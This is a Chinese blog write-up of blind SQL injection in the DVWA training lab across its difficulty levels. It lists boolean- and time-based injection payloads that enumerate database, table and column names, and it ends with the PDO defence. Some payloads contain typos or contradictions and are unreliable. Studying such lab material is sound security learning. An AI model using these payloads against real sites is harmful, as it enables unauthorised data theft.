DVWA---全级别SQL Injection(Blind)

SQL Injection(Blind)

SQL盲注与一般注入的区别:

一般的注入攻击者可以直接从页面上看到注入语句的执行结果。

盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。

目前网络上现存的SQL注入漏洞大多是SQL盲注。

盲注分类:

1.基于布尔的盲注

2.基于时间的盲注

3.基于报错的盲注

这里由于实验环境的限制,只演示基于布尔的盲注与基于时间的盲注。

手工盲注的步骤:

1.判断是否存在注入,注入是字符型还是数字型

2.猜解当前数据库名

3.猜解数据库中的表名

4.猜解表中的字段名

5.猜解数据

Low:

首先查看服务器端核心代码:

Low级别的代码对参数id没有做任何检查和过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种。

漏洞利用:

基于布尔的盲注:

1.判断是否存在注入,注入是字符型还是数字型

输入1,显示用户存在。

输入1' and 1=1#,显示用户存在。

输入1' and 1=2#,显示用户不存在。

说明存在字符型的SQL盲注

 

2.猜解当前数据库名

想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。

输入1' and length(database())=1 #,显示不存在。

输入1' and length(database())=2 #,显示不存在。

输入1' and length(database())=3 #,显示不存在。

输入1' and length(database())=4 #,显示存在。

说明数据库名长度为4

采用二分法猜解数据库名:

输入1' and ascii(substr(databse(),1,1))<100 #,显示不存在。

输入1' and ascii(substr(databse(),1,1))>100 #,显示不存在。

说明数据库名的第一个字符的ascii值为100,即小写字母d

重复上述步骤,就可以猜解出完整的数据库名dvwa了。

 

3.猜解数据库中的表名

首先猜解数据库中表的数量:

输入1' and (select count (table_name) from information_schema.tables where table_schema=database())=2 # 显示存在。

说明数据库中共有两个表。

接着挨个猜解表名:

输入1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在。

说明第一个表名长度为9

输入1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显示不存在。

输入1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显示不存在。

说明第一个表的名字的第一个字符为小写字母g。

重复上述步骤,即可猜解出两个表名guestbook和users。

 

4.猜解表中的字段名

首先猜解表中字段的数量:

输入1' and (select count(column_name) from information_schema.columns where table_name='users')=8 # 显示存在。

说明users表有8个字段。

接着挨个猜解字段名:

输入1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7 # 显示存在。

说明users表的第一个字段为7个字符长度。

采用二分法,即可猜解出所有字段名。

 

5.猜解数据

同样采用二分法。

 

基于时间的盲注:

1.判断是否存在注入,注入是字符型还是数字型

输入1' and sleep(5) #,感觉到明显延迟。

输入1' and sleep(5) #,没有延迟。

说明存在字符型的基于时间的盲注。

 

2.猜解当前数据库名

首先猜解数据名的长度:

输入1' and if(length(database())=3,sleep(5),1) # 没有延迟。

输入1' and if(length(database())=4,sleep(5),1) # 明显延迟。

说明数据库名长度为4个字符。

接着采用二分法猜解数据库名:

输入1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟。

输入1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟。

说明数据库名的第一个字符为小写字母d。

重复上述步骤,即可猜解出数据库名。

 

3.猜解数据库中的表名

首先猜解数据库中表的数量:

输入1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟。

输入1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟。

说明数据库中有两个表。

接着挨个猜解表名:

输入1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=8,sleep(5),1) # 没有延迟。

输入1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟。

说明第一个表名的长度为9个字符。

采用二分法即可猜解出表名。

 

4.猜解表中的字段名

首先猜解表中字段的数量:

输入1' and if((select count(column_name) from information_schema.columns where table_name= 'users')=7,sleep(5),1)# 没有延迟。

输入1' and if((select count(column_name) from information_schema.columns where table_name= 'users')=8,sleep(5),1)# 明显延迟。

说明users表中有8个字段。

接着挨个猜解字段名:

输入1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=6,sleep(5),1) # 没有延迟。

输入1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7,sleep(5),1) # 明显延迟。

说明users表的第一个字段长度为7个字符。

采用二分法即可猜解出各个字段名。

 

5.猜解数据

同样采用二分法。

Medium:

首先查看服务器端核心代码:

于Low级别的代码相比,Medium级别利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行了转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

 

漏洞利用:

虽然前端使用了下拉选择菜单,但我们可以使用burosuite通过抓包改参数id,提交恶意构造的查询参数,输入命令与Low级别相同。

High

首先查看服务器端核心代码:

与Medium级别的代码相比,High级别利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,查询输入与结果输出窗口分开了。

 

漏洞利用:

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响,这里我们用基于布尔的盲注即可,具体操作与Low级别的基于布尔的盲注相同。

Impossible:

首先查看服务器端核心代码:

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

posted @ 2020-03-01 16:08  强霸卓奇霸  阅读(405)  评论(0)    收藏  举报
https://blog-static.cnblogs.com/files/xiaokang01/js.js 这是添加的文件的链接 color="240,230,140" 粒子的颜色设置 opacity="1" 粒子的透明度 count="75" 粒子的个数